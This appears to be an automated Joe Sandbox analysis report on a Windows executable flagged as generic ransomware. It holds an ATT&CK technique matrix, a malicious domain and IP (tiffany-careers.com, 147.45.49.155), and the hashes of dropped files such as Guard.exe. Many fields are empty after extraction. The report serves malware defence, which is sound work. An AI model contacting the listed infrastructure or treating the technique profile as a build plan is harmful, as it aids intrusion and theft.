| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Window found: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Evasive API call chain: | ||
| Source: | API coverage: | ||
| Source: | API coverage: | ||
| Source: | API coverage: | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Code function: | 0_2_00007FF69DBAC7C0 | |
| Source: | Code function: | 0_2_00007FF69DBABC70 | |
| Source: | Code function: | 0_2_00007FF69DBAB7C0 | |
| Source: | Code function: | 0_2_00007FF69DBB72A8 | |
| Source: | Code function: | 0_2_00007FF69DBB71F4 | |
| Source: | Code function: | 0_2_00007FF69DB72F50 | |
| Source: | Code function: | 0_2_00007FF69DBBA874 | |
| Source: | Code function: | 0_2_00007FF69DBBA4F8 | |
| Source: | Code function: | 0_2_00007FF69DBB6428 | |
| Source: | Code function: | 0_2_00007FF69DBBA350 | |
| Source: | Code function: | 6_2_00194005 | |
| Source: | Code function: | 6_2_0019494A | |
| Source: | Code function: | 6_2_0019C2FF | |
| Source: | Code function: | 6_2_0019CD14 | |
| Source: | Code function: | 6_2_0019CD9F | |
| Source: | Code function: | 6_2_0019F5D8 | |
| Source: | Code function: | 6_2_0019F735 | |
| Source: | Code function: | 6_2_0019FA36 | |
| Source: | Code function: | 6_2_00193CE2 | |
| Source: | Code function: | 13_2_00924005 | |
| Source: | Code function: | 13_2_0092494A | |
| Source: | Code function: | 13_2_0092C2FF | |
| Source: | Code function: | 13_2_0092CD9F | |
| Source: | Code function: | 13_2_0092CD14 | |
| Source: | Code function: | 13_2_0092F5D8 | |
| Source: | Code function: | 13_2_0092F735 | |
| Source: | Code function: | 13_2_0092FA36 | |
| Source: | Code function: | 13_2_00923CE2 | |
| Source: | Code function: | 0_2_00007FF69DB51D80 | |
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Process information queried: | Jump to behavior | ||
| Source: | Code function: | 0_2_00007FF69DBC0A00 | |
| Source: | Code function: | 0_2_00007FF69DB337B0 | |
| Source: | Code function: | 0_2_00007FF69DB55BC0 | |
| Source: | Code function: | 0_2_00007FF69DBC7634 | |
| Source: | Code function: | 0_2_00007FF69DB9D6A0 | |
| Source: | Process token adjusted: | Jump to behavior | ||
| Source: | Process token adjusted: | Jump to behavior | ||
| Source: | Code function: | 0_2_00007FF69DB559C8 | |
| Source: | Code function: | 0_2_00007FF69DB557E4 | |
| Source: | Code function: | 0_2_00007FF69DB78FE4 | |
| Source: | Code function: | 0_2_00007FF69DB6AF58 | |
| Source: | Code function: | 6_2_0015A354 | |
| Source: | Code function: | 6_2_0015A385 | |
| Source: | Code function: | 13_2_008EA385 | |
| Source: | Code function: | 13_2_008EA354 | |
HIPS / PFW / Operating System Protection Evasion | |
|---|
| Source: | Process created: | ||
| Source: | Code function: | 0_2_00007FF69DB9CE68 | |
| Source: | Code function: | 0_2_00007FF69DB337B0 | |
| Source: | Code function: | 0_2_00007FF69DBA9420 | |
| Source: | Code function: | 0_2_00007FF69DBAD1A4 | |
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Code function: | 0_2_00007FF69DB9C5FC | |
| Source: | Code function: | 0_2_00007FF69DB9D540 | |
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Code function: | 0_2_00007FF69DB6FD20 | |
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Code function: | 0_2_00007FF69DB6BEF8 | |
| Source: | Code function: | 0_2_00007FF69DB92BCF | |
| Source: | Code function: | 0_2_00007FF69DB72650 | |
| Source: | Code function: | 0_2_00007FF69DB51D80 | |
| Source: | Key value queried: | Jump to behavior | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Code function: | 0_2_00007FF69DBC4074 | |
| Source: | Code function: | 0_2_00007FF69DBC3940 | |
| Source: | Code function: | 6_2_001A696E | |
| Source: | Code function: | 6_2_001A6E32 | |
| Source: | Code function: | 13_2_0093696E | |
| Source: | Code function: | 13_2_00936E32 | |
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 1 Scripting | 2 Valid Accounts | 2 Native API | 1 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 21 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 3 PowerShell | 2 Valid Accounts | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 26 System Information Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Process Injection | 311 Masquerading | LSA Secrets | 41 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | Cached Domain Credentials | 21 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
InternetThis section contains all screenshots as thumbnails, including those not shown in the slideshow.
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 34% | ReversingLabs | Win32.Ransomware.Generic |
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 8% | ReversingLabs | |||
| 8% | ReversingLabs |
⊘No Antivirus matches
⊘No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 0% | Avira URL Cloud | safe | ||
| 100% | Avira URL Cloud | malware | ||
| 100% | Avira URL Cloud | malware | ||
| 0% | Avira URL Cloud | safe |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| tiffany-careers.com | 147.45.49.155 | true | false | high | |
| nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | unknown | unknown | false | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| true |
| unknown | |
| true |
| unknown |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| false | high | |||
| false | high | |||
| false | high | |||
| true |
| unknown | ||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false | high | |||
| false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 147.45.49.155 | tiffany-careers.com | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false |
| Joe Sandbox version: | 41.0.0 Charoite |
| Analysis ID: | 1581402 |
| Start date and time: | 2024-12-27 14:59:50 +01:00 |
| Joe Sandbox product: | CloudBasic |
| Overall analysis duration: | 0h 8m 49s |
| Hypervisor based Inspection enabled: | false |
| Report type: | full |
| Cookbook file name: | default.jbs |
| Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
| Number of analysed new started processes analysed: | 17 |
| Number of new started drivers analysed: | 0 |
| Number of existing processes analysed: | 0 |
| Number of existing drivers analysed: | 0 |
| Number of injected processes analysed: | 0 |
| Technologies: |
|
| Analysis Mode: | default |
| Analysis stop reason: | Timeout |
| Sample name: | TCKxnQ5CPn.exerenamed because original name is a hash value |
| Original Sample Name: | 2a89603d2620b2a62113513709e38e95.exe |
| Detection: | MAL |
| Classification: | mal100.expl.evad.winEXE@15/12@3/1 |
| EGA Information: |
|
| HCA Information: |
|
| Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 6848 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report creation exceeded maximum time and may have missing disassembly code information.
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size exceeded maximum capacity and may have missing disassembly code.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: TCKxnQ5CPn.exe
| Time | Type | Description |
|---|---|---|
| 09:00:45 | API Interceptor | |
| 09:01:33 | API Interceptor | |
| 09:01:49 | API Interceptor | |
| 14:00:58 | Autostart |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| 147.45.49.155 | Get hash | malicious | Unknown | Browse |
| |
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| tiffany-careers.com | Get hash | malicious | Unknown | Browse |
| |
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| FREE-NET-ASFREEnetEU | Get hash | malicious | PureLog Stealer, zgRAT | Browse |
| |
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | XenoRAT | Browse |
| ||
| Get hash | malicious | LummaC, Amadey, LummaC Stealer, RedLine | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| 3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | LummaC | Browse |
| |
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | DanaBot | Browse |
| ||
| Get hash | malicious | DanaBot | Browse |
| ||
| Get hash | malicious | Vidar | Browse |
| ||
| Get hash | malicious | Quasar | Browse |
| ||
| Get hash | malicious | Quasar | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| C:\Users\Public\Guard.exe | Get hash | malicious | Unknown | Browse | ||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Unknown | Browse |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 893608 |
| Entropy (8bit): | 6.62028134425878 |
| Encrypted: | false |
| SSDEEP: | 12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501 |
| MD5: | 18CE19B57F43CE0A5AF149C96AECC685 |
| SHA1: | 1BD5CA29FC35FC8AC346F23B155337C5B28BBC36 |
| SHA-256: | D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD |
| SHA-512: | A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558 |
| Malicious: | true |
| Antivirus: |
|
| Joe Sandbox View: |
|
| Preview: |
| Process: | C:\Users\user\Desktop\TCKxnQ5CPn.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 493 |
| Entropy (8bit): | 5.219373319007497 |
| Encrypted: | false |
| SSDEEP: | 12:fZ7xFEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:fdxCknZ9LzjYnRSb8Cba |
| MD5: | 6A07686CA1D212167C47D753146E2147 |
| SHA1: | 854DAFCBEAAB17DF65833F4B517E6A8132A5256C |
| SHA-256: | 76EC46EDAA320817BC6B5E13161B2F2A0F984061E4C94B5A06D88A00F563BE2A |
| SHA-512: | F2F606B3303AD05303E4C0166D4F0F68C74FF71372F3A88CEA6DF515258A22970414421C408853D830B5F09B240C970BE4B30639B55CECA5DD868FFD4570C2C5 |
| Malicious: | true |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1149415 |
| Entropy (8bit): | 5.199763656099886 |
| Encrypted: | false |
| SSDEEP: | 12288:28V+jcfSw6xHpcFTkUCroPzZsc2gmjoiVRS9CyaQZflhM8smx8/d:qcLkpcpLCrOzZTob5JAli1 |
| MD5: | 83D3BBFFAED5F5FAD2D1C3750DCE9E97 |
| SHA1: | 6C94B2ADDC358CFC5B0071727FA9B5FB5F4EFB88 |
| SHA-256: | 9A23CA3C836B127A29112AC64B41072CF13B5C3FEA77E2A5B836514B21D7C95A |
| SHA-512: | EE9EEF5CCB1FFB147D500D56C90B280790A661C72A38997C7B516370F2E6ACC9BD829DF9D9959C4AD3E21C5E810BD6816FFC1547D470B72C76F46F6593E3094C |
| Malicious: | true |
| Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 64 |
| Entropy (8bit): | 0.34726597513537405 |
| Encrypted: | false |
| SSDEEP: | 3:Nlll:Nll |
| MD5: | 446DD1CF97EABA21CF14D03AEBC79F27 |
| SHA1: | 36E4CC7367E0C7B40F4A8ACE272941EA46373799 |
| SHA-256: | A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF |
| SHA-512: | A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 60 |
| Entropy (8bit): | 4.038920595031593 |
| Encrypted: | false |
| SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
| MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
| SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
| SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 60 |
| Entropy (8bit): | 4.038920595031593 |
| Encrypted: | false |
| SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
| MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
| SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
| SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 60 |
| Entropy (8bit): | 4.038920595031593 |
| Encrypted: | false |
| SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
| MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
| SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
| SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 60 |
| Entropy (8bit): | 4.038920595031593 |
| Encrypted: | false |
| SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
| MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
| SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
| SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
| Malicious: | false |
| Preview: |
| Process: | C:\Users\Public\Guard.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1149412 |
| Entropy (8bit): | 5.199720915817413 |
| Encrypted: | false |
| SSDEEP: | 12288:D8V+jcfSw6xHpcFTkUCroPzZsc2gmjoiVRS9CyaQZflhM8smx8/d:DcLkpcpLCrOzZTob5JAli1 |
| MD5: | 871CCC978BDD281E863F3495FD632585 |
| SHA1: | A411AD4AA70904C07791EB70E98B63DCFD862711 |
| SHA-256: | 3A08EBD5BEC10B61C51F4D647A7CFCA5F6197DF364E79F8450AF8E4502F1283B |
